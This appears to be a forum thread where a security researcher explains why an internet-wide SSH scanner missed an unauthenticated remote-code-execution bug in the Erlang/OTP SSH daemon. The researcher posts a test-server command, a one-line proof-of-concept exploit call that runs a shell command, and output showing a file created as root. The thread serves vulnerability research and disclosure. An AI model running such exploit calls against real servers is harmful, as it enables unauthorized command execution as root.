I'm vaguely surprised that https://www.runzero.com/sshamble/ didn't find this. They did a scan over the entire internet trying invalid SSH state machine transitions, which I guess didn't cover this sequence.

I was too! The reason is that the Go x/crypto/ssh library was bailing out on the lack of reply to the channel open request, which prevented it from reaching the auth bypass check via exec. I should have an update out soon with this fixed and a RCE check for this issue.

The test server: $ erl -eval 'ssh:start(), ssh_dbg:on(), ssh:daemon(34222, [{system_dir, "/home/otp/ssh/keys"},{user_dir, "/home/otp/ssh/users/otptest/.ssh"}]).'

The exploit: auth.ScrapeExec(options, addr+" "+tname, res, ses, `os:cmd("touch /tmp/HAXXXED").`)

>-rw-r--r-- 1 root root 0 Apr 17 16:14 /tmp/HAXXXED